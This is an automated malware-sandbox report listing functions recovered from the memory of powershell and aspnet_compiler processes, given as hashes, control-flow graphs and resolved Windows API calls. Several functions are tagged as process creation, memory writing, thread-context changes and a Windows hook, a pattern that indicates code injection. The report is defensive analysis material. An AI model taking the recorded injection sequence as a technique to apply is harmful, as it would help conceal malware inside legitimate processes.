                                                                                                          • Opcode Fuzzy Hash: 9b032ac479ddecd8907ff787f6f5abc37327a4a7dcb6592a0a644b72bd63651b
                                                                                                          • Instruction Fuzzy Hash: 2731C57190CA5D8FDB19EF6CC8496E9BBE0FB55311F04426AD049C3152DB74A806CB91
                                                                                                          Function 00007FFB4B6129F5 Relevance: .4, Instructions: 448COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 291 7ffb4b6129f5-7ffb4b612a84 295 7ffb4b612cec-7ffb4b612dab 291->295 296 7ffb4b612a8a-7ffb4b612a94 291->296 297 7ffb4b612aad-7ffb4b612ab2 296->297 298 7ffb4b612a96-7ffb4b612a97 296->298 301 7ffb4b612c90-7ffb4b612c9a 297->301 302 7ffb4b612ab8-7ffb4b612abb 297->302 300 7ffb4b612a9c-7ffb4b612aa3 298->300 300->297 309 7ffb4b612aa5-7ffb4b612aab 300->309 304 7ffb4b612c9c-7ffb4b612ca8 301->304 305 7ffb4b612ca9-7ffb4b612ce9 301->305 306 7ffb4b612abd-7ffb4b612ad0 302->306 307 7ffb4b612ad2 302->307 305->295 312 7ffb4b612ad4-7ffb4b612ad6 306->312 307->312 309->297 312->301 313 7ffb4b612adc-7ffb4b612af4 312->313 313->300 320 7ffb4b612af6-7ffb4b612b10 313->320 329 7ffb4b612b12-7ffb4b612b25 320->329 330 7ffb4b612b27 320->330 333 7ffb4b612b29-7ffb4b612b2b 329->333 330->333 333->301 334 7ffb4b612b31-7ffb4b612b39 333->334 334->295 335 7ffb4b612b3f-7ffb4b612b49 334->335 336 7ffb4b612b4b-7ffb4b612b63 335->336 337 7ffb4b612b65-7ffb4b612b75 335->337 336->337 337->301 341 7ffb4b612b7b-7ffb4b612bac 337->341 341->301 347 7ffb4b612bb2-7ffb4b612bde 341->347 352 7ffb4b612be0-7ffb4b612c07 347->352 353 7ffb4b612c09 347->353 354 7ffb4b612c0b-7ffb4b612c0d 352->354 353->354 354->301 356 7ffb4b612c13-7ffb4b612c1b 354->356 357 7ffb4b612c2b 356->357 358 7ffb4b612c1d-7ffb4b612c27 356->358 362 7ffb4b612c30-7ffb4b612c45 357->362 360 7ffb4b612c47-7ffb4b612c76 358->360 361 7ffb4b612c29 358->361 367 7ffb4b612c7d-7ffb4b612c8f 360->367 361->362 362->360
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2052036162.00007FFB4B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B610000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b610000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 03a4820b96d06a8f5c0311d45ca4ff40338f60a1f4f113eb6f271f1c5b56b2db
                                                                                                          • Instruction ID: dc707f4f5b97b44c7690862c232f97cccaadab3183738573f8347d811c9b36a6
                                                                                                          • Opcode Fuzzy Hash: 03a4820b96d06a8f5c0311d45ca4ff40338f60a1f4f113eb6f271f1c5b56b2db
                                                                                                          • Instruction Fuzzy Hash: 9BD117A290EB8A4FEBA6AF78CC555B5BFD1EF46314B0840FED54CC70A7D9289805C351
                                                                                                          Function 00007FFB4B233401 Relevance: .3, Instructions: 276COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 465 7ffb4b233401-7ffb4b233409 466 7ffb4b23340b-7ffb4b233455 465->466 467 7ffb4b233457-7ffb4b233482 465->467 466->467 470 7ffb4b233589-7ffb4b23363e 467->470 471 7ffb4b233488-7ffb4b233492 467->471 472 7ffb4b2334ae-7ffb4b2334bb 471->472 473 7ffb4b233494-7ffb4b2334ac 471->473 477 7ffb4b2334bd-7ffb4b2334c0 472->477 478 7ffb4b233531-7ffb4b23353b 472->478 473->472 477->478 481 7ffb4b2334c2-7ffb4b2334ca 477->481 482 7ffb4b23353d-7ffb4b233547 478->482 483 7ffb4b233548-7ffb4b233586 478->483 481->470 485 7ffb4b2334d0-7ffb4b2334da 481->485 483->470 487 7ffb4b2334dc-7ffb4b2334f1 485->487 488 7ffb4b2334f3-7ffb4b2334f7 485->488 487->488 488->478 492 7ffb4b2334f9 488->492 497 7ffb4b2334fe-7ffb4b233507 492->497 499 7ffb4b233520-7ffb4b233530 497->499 500 7ffb4b233509-7ffb4b233516 497->500 500->499 503 7ffb4b233518-7ffb4b23351e 500->503 503->499
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b928f05847aa7e7c6a10744dfd99bde14a761bbaaa2e43e2752b92ddf57fab03
                                                                                                          • Instruction ID: 53b2363e630b268a48bedb0f48085e8e6515786ba78eca4a7812ae66f2aace94
                                                                                                          • Opcode Fuzzy Hash: b928f05847aa7e7c6a10744dfd99bde14a761bbaaa2e43e2752b92ddf57fab03
                                                                                                          • Instruction Fuzzy Hash: C18122B290DA8D4FD792FB78D8485A6BFE0FF59300B0441BAE64CC71A3EA28D905C751
                                                                                                          Function 00007FFB4B23CEDA Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d2f36dac0431b6e5b897b2450c88ad5521864f69d53e047b8db1af767a421ce7
                                                                                                          • Instruction ID: 289a8727b22674d31e26b1af5a11455f65f2393a325ff142827b436b0c10c96b
                                                                                                          • Opcode Fuzzy Hash: d2f36dac0431b6e5b897b2450c88ad5521864f69d53e047b8db1af767a421ce7
                                                                                                          • Instruction Fuzzy Hash: 712149A3A1DB4A4FE396BB7C9901174BAC2EF8531074860FBD60DC31A3DD1AEC178281
                                                                                                          Function 00007FFB4B2312A1 Relevance: .1, Instructions: 80COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48cd314db1731ddc9ce28919ff1f839fb23a32ba0280a4426cd2f049cd1b1991
                                                                                                          • Instruction ID: be133d13bc444ac0b122df868b6f0c3e08c60598ed73a7c99a0158c4b62e70d5
                                                                                                          • Opcode Fuzzy Hash: 48cd314db1731ddc9ce28919ff1f839fb23a32ba0280a4426cd2f049cd1b1991
                                                                                                          • Instruction Fuzzy Hash: 391159A3B1DB850FE35A7A7CA8460B4FBC2EF8962175451BEE14DC3193EC196C13439A
                                                                                                          Function 00007FFB4B2373F5 Relevance: .0, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c5a3b9fbda49928f31214813c98b5c7d4bb9afe1839a86261d80f8a11c7f62c0
                                                                                                          • Instruction ID: 61469d430e28c634f7a1f51bbc339b2e7de641424298ff33b310a19b3e1635bb
                                                                                                          • Opcode Fuzzy Hash: c5a3b9fbda49928f31214813c98b5c7d4bb9afe1839a86261d80f8a11c7f62c0
                                                                                                          • Instruction Fuzzy Hash: 3AF0F662B0C9068EE799BA3CE6455B4FAE2EF8422075455BAD34DC2067DE1AF8128281
                                                                                                          Function 00007FFB4B230296 Relevance: .0, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bda668fe3c4cc6a2367ca459d9e0b7eab6ac2e96b47e3d3cf6ef80ab0e5dac9
                                                                                                          • Instruction ID: e5ec9d73e01b58fb5b1f8f52eca72fb35a93c75e50c59d31ea9ca433f13fb84a
                                                                                                          • Opcode Fuzzy Hash: 4bda668fe3c4cc6a2367ca459d9e0b7eab6ac2e96b47e3d3cf6ef80ab0e5dac9
                                                                                                          • Instruction Fuzzy Hash: 9CE026A3F0E92E0AF2A2B97C6A463F5E6C0DF4462070421B3DA4CC3162ED089C2043E0

                                                                                                          Non-executed Functions

                                                                                                          Function 00007FFB4B178B0C Relevance: .8, Instructions: 751COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 33c13202877648b25b237d4c364fbeb3c5e9663238d349d56e566aada1d6d826
                                                                                                          • Instruction ID: 8ca6d4958d20b2dd384359106a676f548babca5e937c30bec83f0444b636a20c
                                                                                                          • Opcode Fuzzy Hash: 33c13202877648b25b237d4c364fbeb3c5e9663238d349d56e566aada1d6d826
                                                                                                          • Instruction Fuzzy Hash: 1F42087092CA894FEB64EF28C905BA577E0FF55304F14817DDA8DC72A2DA34A945CB81
                                                                                                          Function 00007FFB4B178B95 Relevance: .6, Instructions: 599COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ba486156474fac962f86e3060b63f583d63114318e3c28d3f6bb8baf0b24aae2
                                                                                                          • Instruction ID: 0059f83ac4dec97b9927a2d5b4b1264848fbcdfc871d61b96675828e31caad9d
                                                                                                          • Opcode Fuzzy Hash: ba486156474fac962f86e3060b63f583d63114318e3c28d3f6bb8baf0b24aae2
                                                                                                          • Instruction Fuzzy Hash: E212F77052CA4A8FEBA4EF28C905BB577D1FF54314F108179DA8DC72A2DE34E9458B81
                                                                                                          Function 00007FFB4B1631AA Relevance: .1, Instructions: 142COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8c0ca57dc1da8f1860cfe113ec53f0b5504492b5ea9c5b9bd7b48b79b1e6acf1
                                                                                                          • Instruction ID: 0763fe43c4d2a1f0431ee4f9ca9c407bd811f53715eb9349aef1f61ea7aa1235
                                                                                                          • Opcode Fuzzy Hash: 8c0ca57dc1da8f1860cfe113ec53f0b5504492b5ea9c5b9bd7b48b79b1e6acf1
                                                                                                          • Instruction Fuzzy Hash: D54172C6A1E6C64FE3436B3CA9750EA7F60EF5326970941FBCAC5860A3DD09640B8721
                                                                                                          Function 00007FFB4B23840F Relevance: 6.7, Strings: 5, Instructions: 430COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0J8K$0J8K$0J8K$0J8K$0J8K
                                                                                                          • API String ID: 0-854148929
                                                                                                          • Opcode ID: a5c51b594a35664f3080ed7c2afc82c3c2c3f627ccac2ef9f17a63edadd5b41b
                                                                                                          • Instruction ID: e542eaff71bfe1d6f1cf74edc4d1529b583b709e610a591ecaf14a6018683b68
                                                                                                          • Opcode Fuzzy Hash: a5c51b594a35664f3080ed7c2afc82c3c2c3f627ccac2ef9f17a63edadd5b41b
                                                                                                          • Instruction Fuzzy Hash: 3FE1F3B290DAC54FE796FF78C864664BFE1EF56300B1840EED189CF1A3DA289845C751

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:7.5%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:12
                                                                                                          Total number of Limit Nodes:0

                                                                                                          Executed Functions

                                                                                                          Function 00007FFB4B168B7D Relevance: 2.0, APIs: 1, Instructions: 513processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 323caf7fca98a150950425a424931ee5d9925dab01e93d4538a54dbbf79d33e7
                                                                                                          • Instruction ID: 9ba2705a24d82e0d8ee74bf45c6c9f18c077f91f6ce73cc391176daf77e620ca
                                                                                                          • Opcode Fuzzy Hash: 323caf7fca98a150950425a424931ee5d9925dab01e93d4538a54dbbf79d33e7
                                                                                                          • Instruction Fuzzy Hash: AE025C70919A8D8FEBB8EF28C8597E977E1FB59301F00416ED80ECB291DB749645CB81
                                                                                                          Function 00007FFB4B16865D Relevance: 1.7, APIs: 1, Instructions: 217injectionCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: c7692baceb82cc62891fe3e6a3a2941ca5e0012dd64890bee6bfb2a336d70230
                                                                                                          • Instruction ID: fc8a94710fdd7b0806e102bcbf78cf75cef20c0b2ad398e6fe712da889932b15
                                                                                                          • Opcode Fuzzy Hash: c7692baceb82cc62891fe3e6a3a2941ca5e0012dd64890bee6bfb2a336d70230
                                                                                                          • Instruction Fuzzy Hash: F5614B70908A1D8FDB94EF68C885BE9BBF1FB69311F1081AAD44CE3255DB74A985CF40
                                                                                                          Function 00007FFB4B168305 Relevance: 1.7, APIs: 1, Instructions: 181threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 3d42ca37f3125b58f671d65d1ba8c4aef8eb0b0a0396a1814782f2a3b8d4468e
                                                                                                          • Instruction ID: 8a3327f806d425af1bfcf7094a0c5531330182cb92f35d79f47010daad26f4ed
                                                                                                          • Opcode Fuzzy Hash: 3d42ca37f3125b58f671d65d1ba8c4aef8eb0b0a0396a1814782f2a3b8d4468e
                                                                                                          • Instruction Fuzzy Hash: E6514A70908A4D8FEB54EFA8C889BEDBBF1FB55311F1082AAD048E3255CB74A485CF40
                                                                                                          Function 00007FFB4B1681AD Relevance: 1.7, APIs: 1, Instructions: 156threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: c16adbadcd9eba0e302be7a73e6c7909c5efd521eb5c8d1a8a271e4a4ede7123
                                                                                                          • Instruction ID: a8e3b54ca89c67ab9d2da775a41d80439f57bb04816ec5c0774d9aecaee6c1c6
                                                                                                          • Opcode Fuzzy Hash: c16adbadcd9eba0e302be7a73e6c7909c5efd521eb5c8d1a8a271e4a4ede7123
                                                                                                          • Instruction Fuzzy Hash: C2518A70D0C78D8FDB55EFA8C885AE9BBB0EF56310F0041AAD449E7292DA74A486CF51
                                                                                                          Function 00007FFB4B233129 Relevance: 1.4, Instructions: 1359COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1828119793.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d73dcbf3ba1f0a23d83d70402efa8c91dc682124293e8276a34dfaa012b1c571
                                                                                                          • Instruction ID: 4481654f49f6271124cdcaa7363c910afee2f2f1ce5db63287f1e5ae1ce2bce0
                                                                                                          • Opcode Fuzzy Hash: d73dcbf3ba1f0a23d83d70402efa8c91dc682124293e8276a34dfaa012b1c571
                                                                                                          • Instruction Fuzzy Hash: 8CA14962A0DBC50FE796BB3C98551B5BFD1EF86210B0841FFD189C71A3DD189D068392
                                                                                                          Function 00007FFB4B23210D Relevance: .7, Instructions: 704COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 149 7ffb4b23210d-7ffb4b232197 154 7ffb4b23219d-7ffb4b2321a7 149->154 155 7ffb4b2322ef-7ffb4b23231a 149->155 156 7ffb4b2321c3-7ffb4b2321d0 154->156 157 7ffb4b2321a9-7ffb4b2321c1 154->157 165 7ffb4b23231d-7ffb4b2323a1 155->165 166 7ffb4b23231c 155->166 163 7ffb4b232290-7ffb4b23229a 156->163 164 7ffb4b2321d6-7ffb4b2321d9 156->164 157->156 169 7ffb4b23229c-7ffb4b2322a8 163->169 170 7ffb4b2322a9-7ffb4b2322ec 163->170 164->163 167 7ffb4b2321df-7ffb4b2321e7 164->167 195 7ffb4b2323a3 165->195 196 7ffb4b2323a4-7ffb4b2323b5 165->196 166->165 167->155 171 7ffb4b2321ed-7ffb4b2321f7 167->171 170->155 174 7ffb4b232210-7ffb4b232214 171->174 175 7ffb4b2321f9-7ffb4b23220e 171->175 174->163 179 7ffb4b232216-7ffb4b232219 174->179 175->174 180 7ffb4b23221b-7ffb4b23223e 179->180 181 7ffb4b232240 179->181 183 7ffb4b232242-7ffb4b232244 180->183 181->183 183->163 186 7ffb4b232246-7ffb4b232259 183->186 191 7ffb4b232260-7ffb4b232269 186->191 193 7ffb4b23226b-7ffb4b232278 191->193 194 7ffb4b232282-7ffb4b23228f 191->194 193->194 200 7ffb4b23227a-7ffb4b232280 193->200 195->196 198 7ffb4b2323b7 196->198 199 7ffb4b2323b8-7ffb4b2323f0 196->199 198->199 204 7ffb4b2323f1-7ffb4b232400 199->204 200->194 204->204 205 7ffb4b232402-7ffb4b232441 204->205 208 7ffb4b232589-7ffb4b232593 205->208 209 7ffb4b232447-7ffb4b232456 205->209 212 7ffb4b232595-7ffb4b2325a7 208->212 213 7ffb4b2325a8-7ffb4b2325ee 208->213 210 7ffb4b2325fb-7ffb4b23263f 209->210 211 7ffb4b23245c-7ffb4b232466 209->211 226 7ffb4b232641-7ffb4b232650 210->226 215 7ffb4b23247f-7ffb4b232484 211->215 216 7ffb4b232468-7ffb4b23247d 211->216 236 7ffb4b2325f1-7ffb4b2325f6 213->236 215->208 218 7ffb4b23248a-7ffb4b232491 215->218 216->215 218->210 221 7ffb4b232497-7ffb4b2324a1 218->221 224 7ffb4b2324a3-7ffb4b2324b8 221->224 225 7ffb4b2324ba-7ffb4b2324cb 221->225 224->225 231 7ffb4b2324cd-7ffb4b2324d6 225->231 232 7ffb4b2324d8-7ffb4b2324ee 225->232 226->226 230 7ffb4b232652-7ffb4b2326da 226->230 231->232 232->210 240 7ffb4b2324f4-7ffb4b2324fe 232->240 247 7ffb4b23254d-7ffb4b232586 236->247 242 7ffb4b232500-7ffb4b232515 240->242 243 7ffb4b232517-7ffb4b232547 240->243 242->243 243->236 243->247 247->208
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1828119793.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0e7f2aa5f691d99420bf6b0b221d83ae6907db87afd20edd87d89eaf3eb30420
                                                                                                          • Instruction ID: 54611ad28c6db1c429389988a2ccc708db8640e5ef1b8c35f3fa3d75c9ff83d7
                                                                                                          • Opcode Fuzzy Hash: 0e7f2aa5f691d99420bf6b0b221d83ae6907db87afd20edd87d89eaf3eb30420
                                                                                                          • Instruction Fuzzy Hash: BA223BA2A1DBC54FEB96BB3C8865574BFE1DF56210B0841FBD589C70A3DD18AC06C351

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:6.9%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:44
                                                                                                          Total number of Limit Nodes:5
                                                                                                          execution_graph 13407 cc7ec8 DuplicateHandle 13408 cc7f5e 13407->13408 13409 cc29c8 13410 cc2a0c SetWindowsHookExW 13409->13410 13412 cc2a52 13410->13412 13413 cc84e0 13414 cc850e 13413->13414 13417 cc7a6c 13414->13417 13416 cc852e 13418 cc7a77 13417->13418 13419 cc9054 13418->13419 13421 cca8e0 13418->13421 13419->13416 13422 cca901 13421->13422 13423 cca925 13422->13423 13425 ccaa90 13422->13425 13423->13419 13426 ccaa9d 13425->13426 13427 ccaad6 13426->13427 13429 cc8c84 13426->13429 13427->13423 13430 cc8c8f 13429->13430 13432 ccab48 13430->13432 13433 cc8cb8 13430->13433 13432->13432 13434 cc8cc3 13433->13434 13437 cc8cc8 13434->13437 13436 ccabb7 13436->13432 13438 cc8cd3 13437->13438 13443 ccbacc 13438->13443 13440 ccbed8 13440->13436 13441 cca8e0 KiUserCallbackDispatcher 13441->13440 13442 ccbcb0 13442->13440 13442->13441 13444 ccbad7 13443->13444 13445 ccd4ca 13444->13445 13447 ccd518 13444->13447 13445->13442 13448 ccd56b 13447->13448 13449 ccd576 KiUserCallbackDispatcher 13448->13449 13450 ccd5a0 13448->13450 13449->13450 13450->13445 13451 cc7c80 13452 cc7cc6 GetCurrentProcess 13451->13452 13454 cc7d18 GetCurrentThread 13452->13454 13456 cc7d11 13452->13456 13455 cc7d55 GetCurrentProcess 13454->13455 13457 cc7d4e 13454->13457 13460 cc7d8b 13455->13460 13456->13454 13457->13455 13458 cc7db3 GetCurrentThreadId 13459 cc7de4 13458->13459 13460->13458

                                                                                                          Executed Functions

                                                                                                          Function 00CC7C7A Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7CFE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 00CC7D3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7D78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CC7DD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 894ee020491a20ca1ddc531f1ec21e22a6f48bf258a879e5fc056447146b8068
                                                                                                          • Instruction ID: fe032a1cfcb20440fa191aee31b2a7e9b169792b8676d1b33defa92361185b78
                                                                                                          • Opcode Fuzzy Hash: 894ee020491a20ca1ddc531f1ec21e22a6f48bf258a879e5fc056447146b8068
                                                                                                          • Instruction Fuzzy Hash: 185143B090034A8FDB18DFAAD548BAEBBF5EF88314F208459E419A7390DB745984CF65
                                                                                                          Function 00CC7C80 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7CFE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 00CC7D3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7D78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CC7DD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 80049620deb079d49f10a9a38d56af9aaca5017ef5bfcb75bdcfcc5157db550a
                                                                                                          • Instruction ID: 82bda28f9c0d3eb8646c242c57445f1ae9b3133d5c26a18f0563baec083b9e11
                                                                                                          • Opcode Fuzzy Hash: 80049620deb079d49f10a9a38d56af9aaca5017ef5bfcb75bdcfcc5157db550a
                                                                                                          • Instruction Fuzzy Hash: B25144B09003498FDB18DFAAD548BAEBBF5EF88314F20845DE419A7390DB745984CF65
                                                                                                          Function 00CC7EC0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 179 cc7ec0-cc7f5c DuplicateHandle 180 cc7f5e-cc7f64 179->180 181 cc7f65-cc7f82 179->181 180->181
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CC7F4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: ba74d8c609175796a372507617bafbeffd878fa625501a3b672b3f737fc37973
